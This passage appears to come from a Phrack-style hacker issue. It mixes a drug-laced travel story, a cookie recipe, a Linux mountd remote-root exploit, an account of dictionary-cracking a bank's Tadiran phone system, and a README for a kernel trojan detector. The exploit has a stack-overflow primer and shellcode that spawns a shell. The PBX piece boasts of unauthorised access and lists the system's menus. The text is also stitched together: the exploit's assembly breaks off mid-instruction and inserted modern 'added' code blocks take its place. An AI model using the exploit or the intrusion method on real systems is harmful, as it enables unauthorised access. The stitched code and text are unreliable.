other ideas. He wanted his 25 guilders to take his aspirin to X,
apparently (For those of you unfamiliar, a guilder is the Netherlands unit
of money, and roughly resembles monopoly money, except a guilder isn't
really worth anything, whereas monopoly is fun!). We refused, and Chico
got mad. He started telling us, "WE ARE GOING TO HAVE A PROBLEM SOON."
After that, things were "STARTING TO GET VERY SERIOUS." Finally, Chico
got pissed off and broke a beer bottle and started going insane, so r00t &
h4g1s made a temporary truce and started running.
After turning several corners, the mad outlaw was chasing after us with
his broken glass wielding in the cold winter night. We were now in the
"red light district", the physical equivalent to the place on the Internet
where you can buy whores and have sex with them, and people were looking
at us funny being chased through the streets.
Day 4:
We slept through day 4.
Day 3:
Things were getting very strange in Amsterdam. Most notably, day 3
happened AFTER day 4. Don't ask me how. It may have related to the
fungus located within a "Inner Visions" container that we consumed in
the hopes of progressing our talks further. We played some Ultima Online,
except we didn't use any computers. I think there was a strange
steakhouse experience at some point this day, but I can't provide any
further details.
Day 5:
Everything in the world is energy vibrating at different rates. If we
can find some way to make our own matter vibrate at a consistently faster
rate we can transcend the physical universe and enter the digital plane.
I think we need to switch tenses back to the past before. With Outlaw out
of the picture, we resumed our negotiations over some spacecakes (it's like
a brownie, or a muffin, or a donut, except it has Zero Day in it).
Day 6:
I thought we ate all the shrooms in Day Pi! Ok, fine. Things are
easier to handle when you have a vision. Vision is just a hallucination
induced by energy waves bouncing around in your head. Your head is cool.
COOL is a lame stock. EBAY is insanely overpriced. So are M3s. Mach 3's
are cool razors. Razors are sharp. Sharp MD players are too thick. As
is Mark's cock. And long!
-r00t & h4g1s
0x2>-------------------------------------------------------------------------
A CASE STUDY: LINUX MOUNTD STACK OVERFLOW
There is nothing new here, but the code is a text book example of how buffer
overflows are done. Even if you have read other articles on buffer overflows
you might find something of value in here. Or maybe not. The case studied
is the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on
Aug 28.
nuuB
<++> linenoise/mountd-sploit.c
/*
* mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will
* give a remote root shell.
*
* Cleaned up, documented and submitted to Phrack on Sep 3 1998.
*
* I've included a quick primer on stack overflows and made lots of comments
* in the code, so if you don't know how these stack overflow exploits work
* take this opportunity to learn something.
*
* It is trivial to extend the code (or use scripting) to make something that
* automatically scans subnets or lists of IPs to find vulnerable systems.
* This is left as an exercise for the enterprising young hax0rs out there.
*
* You need the following RPC files for your particular architecture:
*
* nfsmount.h
* nfsmount_xdr.c
*
* These can be generated from 'mount.x' by the 'rpcgen' utility. I simply
* lifted the files that came pre-generated with Linux 'mount'. These are
* included uuencoded, but they may not work on your particular system. Don't
* bug me about this.
*
* Compile with:
*
* cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit
*
* Have fun, but as always, BEHAVE!
*
* /nuuB
*
*/
/*
A QUICK PRIMER ON STACK OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed
explanation on how to write sploits (the examples are for Linux/i386 but
the methodology is valid for any Unix, and can be applied to other OS's
once you understand the technique). If you are targeting one of Bill's OS
check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog.
The properties that we take advantage of are:
* The stack memory pages have the execute bit set
* The return addresses of functions are stored on the stack at a higher
address than the local variables.
MEMORY MAP
-- Start of stack (i.e bottom of stack - top of memory) e.g 0xc0000000 --
<environment variables>
<stack frames from main() down to the function calling our function>
<arguments to the vulnerable function>
<** return address **>
<frame pointer for prev frame - unless compiled with -fomit-frame-pointer>
<local variables for the vulnerable function>
-- Top of stack (lower memory address) e.g 0xbffff9c8 --
THE OVERFLOW
The trick is to overflow a local variable that is set through a function
that doesn't check for overflows (strcpy, sprintf, etc). By supplying a
(too) long string you can overwrite memory at higher addresses, i.e closer
to the start of the stack. More specifically we want to overwrite
<** return address **> with a pointer that points back into the stack that
contains code we want executed. Getting the code on the stack is done by
including it in the string we are overflowing with, or by placing it in
an environment variable.
The code can do anything you like, but the standard thing is to execve()
a shell. There are often limitations on what the code can look like in
order to be placed unmangled on the stack (length, toupper(), tolower(),
NULL bytes, path stripping etc). It all depends on how the target program
processes the input we feed it. Be prepared for some tinkering to avoid
certain byte patterns and to make the code use PC/IP relative addressing.
The overflow string (called the 'egg') is normally passed to the
target program through command line arguments, environment variables,
tcp connections or in udp packets.
POSSIBLE COMPLICATIONS
Sometimes you will destroy other local variables with your egg (depends on
how the compiler ordered the variables on the stack). If you use a long
enough egg you could also trash the arguments to the function. As your code
isn't executed until the vulnerable function returns (not at the return of
the function doing the actual overflowing, e.g strcpy()), you must make sure
that the corrupted variables don't cause a crash before the return. This
means that your egg probably has to be aligned perfectly, i.e only use one
return pointer and precede it with 'correct' values for the local variables
you are trashing. Unfortunately the ordering of the variables is often
dependent on what compiler options were used. Optimization in particular
can shuffle things around. This means that your exploit will sometimes have
to target a particular set of options.
Most of the time the trashing of other local variables isn't a problem but
you may very well run into it some day.
THE RETURN POINTER
The only problem left is to guess the right address to jump to (i.e the
return pointer). This is done either by trial and error or by examining the
executable (requires you have access to a system identical to the target).
A good way to get a reasonable starting value is to find out how many
environment variables the target process has (hint: use 'ps uxawwwwwwwwe')
and combine that with the base stack pointer (you can find that out with
a one line program that shows the value of the stack pointer).
To increase the chances of success it is customary to fill out the start of
the egg with NOP opcodes, thus as long as the pointer happens to point
somewhere in the egg before the actual code it will execute the NOPs
then the code.
That is all there is to it.
*/
/*
* Now, back to our case study.
*
* Target: rpc.mountd:logging.c
*
* void Dprintf(int kind, const char *fmt, ...) {
* char buff[1024];
* va_list args;
* time_t now;
* struct tm *tm;
*
* if (!(kind & (L_FATAL | L_ERROR | L_WARNING))
* && !(logging && (kind & dbg_mask)))
* return;
* ...
* vsprintf(buff, fmt, args); <-- This is where the overflow is done.
* ...
* if (kind & L_FATAL)
* exit(1);
* } <-- This is where our code (hopefully) gets executed
*
* This function is called from (e.g) mountd.c in svc_req() as follows:
*
* #ifdef WANT_LOG_MOUNTS
* Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n",
* inet_ntoa(addr), argbuf);
* #endif
*
* Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type
* L_WARNING is always logged, and all we have to do is to try to mount
* something we are not allowed to (i.e as long as we are not included in
* /etc/exports we will be logged and get a chance to overflow).
*
* The only complication is the first %s that we will have to compensate for
* in the egg (our pointers must be aligned correctly).
*
* We use 5 pointers to avoid problems related to how the compiler organized
* the variables on the stack and if the executable was compiled with or
* without -fomit-frame-pointer.
*
* 3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5
*
* Still plenty of room left for NOPs in the egg. We do have to make sure that
* if the 3 other variables are trashed it won't cause any problems. Examining
* the function we see that 'now' and 'tm' are initialized after the vsprintf()
* and are thus not a problem. However there is a call 'va_end(args)' to end
* the processing of the ellipsis which might be a problem. Luckily this is
* a NOP under Linux. Finally we might have trashed one of the arguments
* 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind'
* will cause an exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008).
* Again, we are in luck. 'kind' is referenced earlier in the function and in
* several other places so the compiler has graciously placed it in a register
* for us. Thus we can trash the arguments all we want.
*
* Actually, if you examine the executables of mountd in the common distros
* you will find that you don't have to trash any variables at all as 'buffer'
* is placed just before the frame pointer and the return address. We could
* have used a simple egg with just one pointer and this would have worked
* just as well in practice.
*
* All this 'luck' is in fact rather common and is the reason why most buffer
* overflows are easy to write so they work most of the time.
*
* Ok. Delivery of the egg is done through the RPC protocol. I won't go into
* details here. If you are interested, get the sources for the servers and
* clients involved. Half the fun is figuring out how to get the egg in place.
*
* The last piece of the puzzle is to keep shoveling data from the local
* terminal over the TCP connection to the shell and back (remember that
* we used dup2() to connect the shell's stdout/in/err to the TCP connection).
*
* Details below.
*/
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <fcntl.h>
#include <signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#include "nfsmount.h"
/*
* First we need to write the code we want executed.
*
* C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh");
*
* setreuid() is probably not necessary, but can't hurt.
*
* fork() is done to change pid. This is needed as someone - probably the
* portmapper - sends signals to mountd (the shell has no handlers for these
* and would die).
*
* The dup2()'s connect stdout/stderr to the TCP socket.
*
* The code assumes 'mountd' communicates with the client using descriptor
* zero. This is the case when it is started as a daemon, but may not be so if
* it is launched from inetd (I couldn't be bothered to test this). The
* dup2()'s may need to be changed accordingly if so.
*
* For Linux/i386 we would get:
*/
#if 0
void c0de() {
__asm__(
"jmp .get_string_addr\n\t" /* Trick to get address of our string */
".d01t:\n\t"
"xorl %eax,%eax\n\t"
"movl %eax,%ebx\n\t" /* ruid=0 */
"movl %eax,%ecx\n\t" /* euid=0 */
"movb $0x46,%eax\n\t" /* __NR_setreuid */
"int $0x8
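As an added defensive counterpart to the case study above (not nuuB's code, nor the rpc.mountd sources): the Dprintf() pattern with vsprintf() replaced by vsnprintf(), a truncation flag, and the svc_req() call site fed an oversized export path. L_FATAL=0x0008 is from the article; the L_WARNING/L_ERROR values and all function and struct names are assumptions for this demo.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Log classes as in the mountd snippet above; L_FATAL=0x0008 is from the
 * article, the other two values are assumed for this demo. */
#define L_WARNING 0x0001
#define L_ERROR   0x0002
#define L_FATAL   0x0008

#define LOG_BUF 1024   /* same fixed buffer size as Dprintf()'s buff[1024] */

/* Outcome of one logging call, so callers (and tests) can see what happened
 * instead of only reading the log line. */
struct log_result {
    int    logged;    /* 0: filtered out by 'kind'; 1: message was formatted */
    int    truncated; /* 1: the message did not fit and was cut at LOG_BUF-1 */
    size_t len;       /* bytes stored, excluding the terminating NUL */
    char   buff[LOG_BUF];
};

/* Hardened counterpart of the vulnerable Dprintf(): same filter, same fixed
 * buffer, but vsnprintf() bounds the write so the caller's frame (saved
 * frame pointer, return address) can no longer be overwritten. */
void safe_dprintf(struct log_result *r, int kind, const char *fmt, ...)
{
    va_list args;
    int n;

    memset(r, 0, sizeof *r);
    if (!(kind & (L_FATAL | L_ERROR | L_WARNING)))
        return;

    va_start(args, fmt);
    n = vsnprintf(r->buff, sizeof r->buff, fmt, args);
    va_end(args);

    r->logged = 1;
    if (n < 0) {               /* encoding error: leave an empty, NUL-terminated line */
        r->buff[0] = '\0';
        return;
    }
    /* vsnprintf() returns the length the complete message would have had;
     * anything >= the buffer size means the input was cut short. */
    r->truncated = (size_t)n >= sizeof r->buff;
    r->len = r->truncated ? sizeof r->buff - 1 : (size_t)n;
}

/* Mirrors the svc_req() call site quoted above; both strings arrive from
 * the network, so neither length can be trusted. */
void log_blocked_mount(struct log_result *r, const char *addr, const char *argbuf)
{
    safe_dprintf(r, L_WARNING, "Blocked attempt of %s to mount %s\n", addr, argbuf);
}

/* A short, well-formed request (constructed) is logged verbatim. */
int demo_normal_message(void)
{
    struct log_result r;
    log_blocked_mount(&r, "10.0.0.1", "/export/home");
    return r.logged && !r.truncated
        && strcmp(r.buff, "Blocked attempt of 10.0.0.1 to mount /export/home\n") == 0;
}

/* A 2000-byte export path (constructed), longer than the egg needs to be:
 * the message is cut at 1023 bytes and the buffer stays NUL-terminated. */
int demo_oversized_path(void)
{
    char argbuf[2000];
    struct log_result r;

    memset(argbuf, 'A', sizeof argbuf - 1);
    argbuf[sizeof argbuf - 1] = '\0';
    log_blocked_mount(&r, "10.0.0.1", argbuf);
    return r.logged && r.truncated && r.len == LOG_BUF - 1
        && strlen(r.buff) == LOG_BUF - 1;
}

/* A debug-only 'kind' is filtered before any formatting happens. */
int demo_filtered_kind(void)
{
    struct log_result r;
    safe_dprintf(&r, 0x0100, "%s", "never formatted");
    return !r.logged && r.buff[0] == '\0';
}

int main(void)
{
    printf("normal message ok:   %d\n", demo_normal_message());
    printf("oversized path safe: %d\n", demo_oversized_path());
    printf("debug kind filtered: %d\n", demo_filtered_kind());
    return 0;
}
```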
0x3>-------------------------------------------------------------------------
Eleet ch0c0late ch1p co0kies
by Juliet
The chocolate chip cookie is an old exploit. You can use it to bribe
your teachers, sysadmins, bosses, even feds. Never underestimate the
cookie. Picture this.. little girlie walks up to you in the NOC.. offers
you a home-baked chocolate chip cookie! She must be someone's secretary..
or something.. wow she sure fooled you.. anyway.. bake them.. they are
good.. DO NOT substitute ingredients.. other than like M&M's for chocolate
chips..
1 cup (packed) golden brown sugar
1/2 cup sugar
1/2 cup solid vegetable shortening, room temperature
1/2 cup (1 stick) unsalted butter, room temperature
2 large eggs
1 tablespoon vanilla extract
3 cups all purpose flour
1 teaspoon baking soda
1 teaspoon salt
1 12-ounce package semisweet chocolate chips
Preheat oven to 350F. Using electric mixer, beat both sugars, shortening
and butter in large bowl until light and fluffy. Beat in eggs and
vanilla. Mix flour, baking soda and salt in large bowl. Add dry
ingredients to butter mixture and mix until blended. Stir in chocolate
chips.
Drop dough by heaping tablespoonfuls onto heavy large baking sheets, spacing
2 inches apart. Bake until golden brown, about 12 minutes. Transfer baking
sheets to racks; cool 5 minutes. Transfer cookies to racks;
cool completely.
Makes about 42 cookies.. or you can make ONE BIG pan cookie
0x4>-------------------------------------------------------------------------
- Tadiran; Computer Telephony Integration (CTI) -
Blakboot <blakboot@darkcartel.com>
Introduction
============
Hello everyone. This article is primarily about Tadiran Telecommunications
software and hardware used to synchronize computer applications with phone
calls. I will be referring to system version 9.63.03.01 and any variants as
just `Tadiran`. From firsthand experiences with this type of system I've
found that they can be configured to do many things, from trunk timers to
on hold music.
Although a very powerful system, the Tadiran lacks basic security. This is
a no-no, especially when it provides worldwide technologies for all types
of industries, including banking.
The issue of lack of security is mainly why I wanted to write this article.
The Tadiran is very much open to intrusion.
How it began
============
A phreak friend of mine, Mf-Man, and I were scanning for loops when we found
a carrier. We took a short look at the system, until our interests waned and
took us elsewhere..
Months later, bored, I dialed into the system, with plans of throwing a
dictionary file at it at a steady pace (Tadiran only requires a password for
authentication).
So, I just sat back, and waited... After a long while, to my gleeful
surprise, it cracked! I (like many others before me) did that zealous
happy dance.
This system, Tadiran, is rather cryptic without documentation. Even so,
I managed to dig up some interesting info. The system I managed to get
into was a CTI system from a well known bank. The major flaws thus
far (I plan to write a more in depth article):
* Unlimited password attempts.
* No login names.
* A password prompt that responds, well, promptly.
What follows are some screen shots of the Tadiran system.
The system
==========
Password prompt: ENTER PASSWORD
Bad password Msg.: ILL PASSWORD , TRY AGAIN !
System prompt: *:
Environment: Tree menus; menus branch from root, and so on.
-This the root menu, the menu sent upon login.-
(ROOT)
CCS 9.63.03.01 SMDI & 24SDT
Copyright (c) 1991-1997 Tadiran Telecommunications Ltd.
NAME - xxxxxxxxx
SAU # - xxxx
0-CONFIG
1-DIAGN
2-TABLES
3-ADMIN
4-ROUTING/COST
5-ISDN
6-DATA
7-CoraLINK
8-NETWORK
9-HELP
Any of the menus/options can be chosen by number, or name.
Control keys:
^C / ESC ------ Go back 1 menu.
^T ------ Displays account and system information.
EXAMPLE:
CCS: xxxxxxxx xxx-xx-1998 10:48pm
Terminal No.: 4, Password level: 0
Software Version: 9.63.03.01 SMDI & 24SDT
^P ------ Relogin.
/* There are others; they seem to have something to do with emulation
and scrolling. */
Menu descriptions - meant for reference.
=========================================
This is a list of globally accessible menus, available by typing "HELP".
<Note> I've "x"'d out all group names from the original system this
information was recovered from.
PI MESSAGES      =(MSG)    FEAT. & AUTH.    =(FEAT)   SMDR CONTROL     =(SMDR)
47/8T CARD_DB    =(TKDB)   FEATURE TIMERS   =(FE.T)   STATION TIMERS   =(ST.T)
ALT ROUT TK.GRP  =(ROUT)   GROUPS           =(GROUP)  SYSTEM GEN.      =(SYSGEN)
xxxx/xxx GROUP   =(xxxx)   xxxxxxx GROUP    =(xxxx)   SYS FEATURES     =(SFE)
xxxx GROUP       =(xxxx)   IST/SLT CARD_DB  =(STDB)   SYS TIME SET-UP  =(TIME)
BUSY PORTS       =(BUSY)   IST/SLT DEF.     =(SLT)    TERMINAL SET-UP  =(TERM)
CARD DATA-BASE   =(CDB)    LCR/ROUTING      =(LCR)    TOLL BARRIER     =(TOLL)
CARD LIST        =(CLIS)   xxxxxxxxx        =(xxx)    TONE PLAN        =(TON)
CLASS OF SERVICE =(COS)    xxxxxxxxxxxxx    =(xxxxx)  TRUNK DEFINITION =(TRK)
COST_CALC.       =(COST)   NUMBERING PLAN   =(NPL)    TRUNK_GROUP      =(TKGP)
DATA SERVICES    =(DATA)   PICKUP GROUP     =(PICK)   TRUNK GRP DEF    =(TGDEF)
xxxx CARD DB     =(DIDB)   PORT DATABASE    =(PDB)    TRUNK PORTS      =(TRUNK)
xxx/xxx GROUP    =(DIDG)   PORT LIST        =(PLIS)   TRUNK TIMERS     =(TK.T)
DIGITAL TRUNK    =(DTDB)   PREFERENCE       =(PREF)   WAKEUP           =(WAKEUP)
KEY DEFINITION   =(KEY)    DIGITAL BUS LIST =(DLIS)   ZONED GROUP      =(VPZ)
KEY PROGRAMING   =(PROG)   RINGER P.S.      =(RPS)    VFAC             =(VFAC)
KEYSET TIMERS    =(EK.T)   SIZES DEF        =(SIZ)    GROUP CALL       =(CALL)
PI MESSAGES - Terminal setup, diag/stim.
47/8T CARD_DB - Card information. Example:
LS_RING_PAUS (sec)- 5
GS_RING_PAUS (sec)- 1
O/G BREAK_TIME(ms)- 60
O/G MAKE_TIME (ms)- 40
O/G INTERDGT_T(ms)- 800
GS_DISCONNECT (ms)- 800
METER (4TMR) :
f0 (0=16K,1=12K,2=50Hz)- 0
f0 ACCURACY +/-(1-10)% - 3
METER_AFTER_DISCONNECT (Y/N) - N
ALT ROUT TK.GRP - Add, display, update, or remove trunk group.
BUSY PORTS - Displays what ports are busy.
CARD DATA-BASE - List many submenus of card, in which you may get/update
CARD LIST - EXAMPLE:
shelf#/slot# p_type i_type card_db# vers/subver status
0 / 1 NO_CARD NO_CARD --- --- --- ------
0 / 2 8DTR/S NO_CARD --- 17 8 ACTIVE
0 / 3 T1 T1 1 14 38 ACTIVE
CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on
trunk control. TENANTS deals with group access.
COST_CALC. - Information about costs for certain services, at various
times.
DIGITAL TRUNK - Card/trunk information, configuration, channel signaling.
KEY DEFINITION - Telephone configuration
EXAMPLE:
prm_cos- 1 sec_cos- 1 priv_libs- 12 terminal- N
origin- N block- N o/g_tk_rest- N privacy- Y
excl_hold- N hard_hold- N last_num- Y security- N
att- Y auto_unatt-N passcode- NONE check_out- N
multi_app- Y m.a.mute_ring-Y mute_ring- Y
auto_ans- N idle_disp.-Y keyclick- Y music- Y
music_num- 0 v_page_in- Y auto_ans_v_p- Y auto_hld/xfer/off-1
spkr_on/off-Y blind_att- N pcc- Y pc_acd- N
mic- Y comb_audio-N display_size- NO_DSP language-DEFAULT
but_num- 2 ksi- N ksi_type- 0
eis- N send_id- Y ali- NONE aoc-e_display-N
alert_makecall-N
active dpem id's- NONE installed dpems- 1
dkt: spkr_environment- 1
music_on_hold - 0
KEYSET TIMERS - EXAMPLE:
1 unit = 0.1 sec.
AUTO_ANSWER - 10
AUTO_ANS_V_PAGE - 10
TONE_TO_IDLE - 10
AOC-E_DISPLAY - 300
MUTE_RING - 50
FEAT. & AUTH - Authorizations, and system features. Check here to
see if Call trace OR caller ID is active.
FEATURE TIMERS - This is a bit interesting.
EXAMPLE:
* (1 unit =1.0 sec)
** (1 unit =0.1 sec)
***(1 unit =0.01 sec)
*AUTO_REDIAL- 30
*REMIND_SNOOZE- 60
*WAKEUP_SNOOZE- 60
**WAKEUP_RING - 300
**NET_FEATURE_ACK- 40
**SUSP_OFFHK- 5
BELL_RING:
**ON_BELL - 10
**OFF_BELL - 20
**ATT.MSG- 50
**EXPENSIVE_ROUTE_TONE - 10
**RING- 100
**SUPV_RECALL- 3600
**CONF_SUPV_RECALL- 1800
**BREAK_IN/OUT- 10
BREAKIN_WARNING:
**ON - 1
**OFF - 20
GROUPS - List of submenus, of groups.
IST/SLT CARD_DB - Ring information.
IST/SLT DEF. - Slot of line info.
EXAMPLE:
prm_cos- 0 sec_cos- 0 priv_libs- 3 terminal- N
origin- N block- N o/g_tk_rest-N privacy- Y
excl_hold-N hard_hold- N last_num- Y security- N
att- N auto_unatt-N passcode- NONE check_out- N
type- 1 announcer- N multi_app- N send_id- Y
ali- NONE opx- N hf_relevant-Y music_on_hold-0
LCR/ROUTING - Libraries, update, or display.
NUMBERING PLAN - Lines, and their features: UPDATE, DISPLAY, ADD,
REMOVE, or SHOW
STATION TIMERS - EXAMPLE:
1 unit = 0.1 sec.
RING- 450
MULT_APR_RING- 200
BUSY- 1200
REORDER- 50
CONFIRM- 30
DVMS- 200
HOLD- 6000
HARD_HOLD- 1200
PARK- 1200
PAGE_Q- 600
1st_DGT - 100
INTERDGT- 150
FEAT_DIAL- 700
HKFLS_FILTER- 10
MAGNETO_AUTO_ANS- 30
CF_NO_ANS- 200
SYSTEM GEN - MENU:
(SYSGEN)
0-INSTALL
1-SIZES_DEF
2-SIZES_TAB
3-SPEED_CALLS (MCC only)
4-MUSIC
5-TIME_SLOTS (4GC only)
0-TRUNK_CALLS_OUTGOING
SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/
incomplete, call_forwarding, camp_on, hotel, messaging,
tones, diagnostics, ISDN, network, and wireless
TONE PLAN - EXAMPLE:
~~~~~~~~
NO  NAME        TYPE  #SEG  1TN  Msec  2TN  Msec  3TN  Msec  4TN  Msec  5TN  Msec  6TN  Msec
 0  Busy         3     2     3   500    0   500    0     0    0     0    0     0    0     0
 1  Dial         1     0     1     0    0     0    0     0    0     0    0     0    0     0
 2  Distinct.    1     0     4     0    0     0    0     0    0     0    0     0    0     0
 3  Reorder      3     2     3   240    0   240    0     0    0     0    0     0    0     0
 4  Ringback     3     2     2  2000    0  4000    0     0    0     0    0     0    0     0
 5  Silence      1     0     0     0    0     0    0     0    0     0    0     0    0     0
 6  Tick         3     2     5    60    0  1000    0     0    0     0    0     0    0     0
 8  Confirm      3     2     1   100    0   100    0     0    0     0    0     0    0     0
 9  BRK_In/Out   1     0     5     0    0     0    0     0    0     0    0     0    0     0
11  V.P Conf     3     2     3   100    5   100    0     0    0     0    0     0    0     0
12  Z.P Warn     3     2     6   300    3   100    0     0    0     0    0     0    0     0
14  LCR_expens   2     6     0   120    5    80    0   120    5    80    0   120    5    80
15  LCR_cheap    2     4     0   120    5    80    0   120    5    80    0     0    0     0
16  Call Wait    3     4     5   600    0  5000    0  5000    0  5000    0     0    0     0
17  DISA Dial    1     0     1     0    0     0    0     0    0     0    0     0    0     0
TRUNK DEFINITION - EXAMPLE:
DISA (0-NO /1-IMMED. /2-DELAY)- 0
COS.- 10
TK_TIMER#- 1
TYPE (0-PULSE /1-DTMF /2-MIX)- 1
I/C_ONLY-N
O/G_ONLY-N
BUSY_OUT-N
AUTO_GUARD-N
HOT_IMMED-N
HOT_DELAY-N
DROP_NO_DIAL-N
RSRVD_TO- NONE
CALLER_ID_TIMEOUT - 50
TRUNK TIMERS - EXAMPLE:
H.FLASH(10ms)- 67
INCOMING :
E&M_SEIZE_TO_WINK- 1
E&M_CONT_WINK_TIME- 2
OUTGOING :
E&M_CONT_WINK/SG_DELAY- 1
SEIZE_TO_DIAL- 15
SECOND_DIAL_TONE- 60
VFAC - Account maintenance. - Requires password.
---The ones that I didn't list were either self-explanatory, or N/A
0x5>-------------------------------------------------------------------------
b t r o m b y r i q
------------------------------------------------------------------------------
"trojan eraser or i want my system call table clean"
------------------------------------------------------------------------------
i n t r o d u c t i o n
------------------------------------------------------------------------------
The other day, I started to play with the itf that appeared in P52-18 (read
that article if you want to know what it does, etc). It occurred to me that one
good way to determine if someone has installed the trojan (and to subsequently
remove it) is by fixing the system call table. This program tries to do that.
This works with the Linux x86 2.0 and 2.2 series.
------------------------------------------------------------------------------
i n t e r n a l s
------------------------------------------------------------------------------
The program first attempts to detect whether you are using a BIG_KERNEL (a bzImage)
or not (a zImage). One of the differences is the address of the kernel in
memory: BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000.
The system call table (sct) holds the entries of all the system calls. If
you modify the sct, the new entry must be `out of range'. btrom will try to
fix these `out of range' system calls with their original values, which are
taken from the System.map. By `out of range' I mean an entry whose value
lies outside the range from start_of_the_kernel to start_of_the_kernel +
some_value. This value is in config.h.
------------------------------------------------------------------------------
q u i c k i n s t a l l
------------------------------------------------------------------------------
compile:
--------
1) edit config.h and the Makefile if you need to (System.map path, NUMERO_VACIO)
$ vi config.h
$ vi Makefile
2) make
$ make
use:
----
1) become root
$ su -
2) load the module mbtrom; it prints the syscall number it took
# insmod mbtrom
3) run btrom with that number
# ./btrom _nr_mbtrom_ [options]
4) unload the module mbtrom
# rmmod mbtrom
------------------------------------------------------------------------------
c h a c h a r a
------------------------------------------------------------------------------
1st part: detect trojans - legend
[ ] this entry is ok. don't worry.
[N] this is a null entry in the system call table. don't worry.
[-] this is the entry of the module mbtrom. don't worry.
[?] this entry has a system function, but it was supposed to be null. worry.
[*] this is probably a trojan in a reserved slot. worry.
[!] this is probably a trojan in a slot that is not reserved. worry.
2nd part: clean trojans - keys
<s> press 's' to fill this entry with the System.map's value.
<c> press 'c' to clean this entry. it will be filled with a null entry.
<m> press 'm' to put a hex address typed by hand in this entry.
<i> press 'i' to ignore, skip, whatever you want.
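As an added example that is not part of btrom (the real check lives in
btrom.c helpers that this copy of the page does not reproduce), the following
user-space C models the test applied to each table slot: derive the kernel
base the way btrom does from the address of sys_call_table, test the live
pointer against the [base, base + LIMITE_SYSCALL) window, and compare it with
the System.map value. Every address below is made up, the table is
constructed, and the mapping of results onto the legend characters is this
example's reading of the legend above.

```c
/*
 * Added example, not btrom's own code: user-space model of the per-slot
 * check. Addresses and the table are constructed for the demonstration.
 */
#include <stdio.h>

#define BIG_KERNEL     0xc0000000UL
#define SMALL_KERNEL   0x00100000UL
#define LIMITE_SYSCALL 0x00300000UL   /* same guess as btrom's config.h */

/* One slot as btrom sees it: the live pointer and the value System.map gives
 * for the syscall name in that slot (0 if the name is unknown to the map). */
struct slot {
    int           nr;
    unsigned long live;
    unsigned long expected;
};

/* btrom derives the kernel base from the address of sys_call_table itself
 * (mode 2 of the mbtrom helper): a bzImage lives above 0xc0000000. */
unsigned long kernel_base(unsigned long sct_addr)
{
    return sct_addr > BIG_KERNEL ? BIG_KERNEL : SMALL_KERNEL;
}

/* A pointer is `in range' when it falls inside the kernel image window. */
int in_kernel_range(unsigned long addr, unsigned long base)
{
    return addr >= base && addr < base + LIMITE_SYSCALL;
}

/* Legend as read from the README: ' ' ok, 'N' null slot, '-' mbtrom's own
 * slot, '?' a real function where System.map says sys_ni_syscall, '*' an
 * out-of-range pointer in a slot that should be null, '!' an out-of-range
 * pointer in a real syscall's slot. */
char classify(const struct slot *s, unsigned long base,
              unsigned long sys_null, unsigned long mbtrom_entry)
{
    if (s->live == 0 || s->live == sys_null) return 'N';
    if (s->live == mbtrom_entry)             return '-';
    if (!in_kernel_range(s->live, base))
        return s->expected == sys_null ? '*' : '!';
    if (s->expected == sys_null)             return '?';
    return ' ';   /* in range: a System.map mismatch here is a map problem, not a hook */
}

/* Count the slots that warrant worry ('?', '*', '!'). */
int count_suspicious(const struct slot *t, int n, unsigned long base,
                     unsigned long sys_null, unsigned long mbtrom_entry)
{
    int bad = 0;
    for (int i = 0; i < n; i++) {
        char c = classify(&t[i], base, sys_null, mbtrom_entry);
        if (c == '?' || c == '*' || c == '!')
            bad++;
    }
    return bad;
}

/* Constructed table (all addresses made up): a clean entry, a null slot, a
 * hooked syscall, a hook parked in a reserved slot, mbtrom's own slot and a
 * kernel function sitting where a null entry was expected. */
static const unsigned long SYS_NULL_ADDR = 0xc0109000UL;  /* sys_ni_syscall */
static const unsigned long MBTROM_ADDR   = 0xc2820000UL;  /* mbtrom in module space */
static const struct slot demo_table[] = {
    {   1, 0xc0100ab0UL, 0xc0100ab0UL },   /* matches System.map */
    {  17, 0xc0109000UL, 0xc0109000UL },   /* unused slot: sys_ni_syscall */
    {  18, 0xc2811000UL, 0xc010ab00UL },   /* points into module space: hooked */
    {  19, 0xc2811200UL, 0xc0109000UL },   /* hook in a reserved slot */
    { 215, 0xc2820000UL, 0xc0109000UL },   /* mbtrom's own entry */
    { 220, 0xc0101234UL, 0xc0109000UL },   /* kernel function where null expected */
};
#define DEMO_N ((int)(sizeof demo_table / sizeof demo_table[0]))

int main(void)
{
    unsigned long base = kernel_base(0xc01a0000UL); /* made-up bzImage sct address */
    for (int i = 0; i < DEMO_N; i++)
        printf("%08lx %3d [%c]\n", demo_table[i].live, demo_table[i].nr,
               classify(&demo_table[i], base, SYS_NULL_ADDR, MBTROM_ADDR));
    printf("%d suspicious entries\n",
           count_suspicious(demo_table, DEMO_N, base, SYS_NULL_ADDR, MBTROM_ADDR));
    return 0;
}
```

The window test is the whole detector: a module's code is mapped well above
base + LIMITE_SYSCALL, so any slot pointing there is flagged regardless of
whether System.map is available, while an in-range pointer that merely
disagrees with System.map is reported as a map problem rather than a hook.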
------------------------------------------------------------------------------
n o t e s
------------------------------------------------------------------------------
this program does not unload trojan modules.
it disables the trojans by restoring their table entries, so after that
you can unload the trojan module with `rmmod'.
------------------------------------------------------------------------------
b u g s
------------------------------------------------------------------------------
if `insmod mbtrom' does not print any number, it is because syslogd is sending
kernel messages somewhere else. Check the "kern" entries in /etc/syslog.conf
to see where they go, or read the kernel ring buffer with `dmesg'.
------------------------------------------------------------------------------
h i s t o r y
------------------------------------------------------------------------------
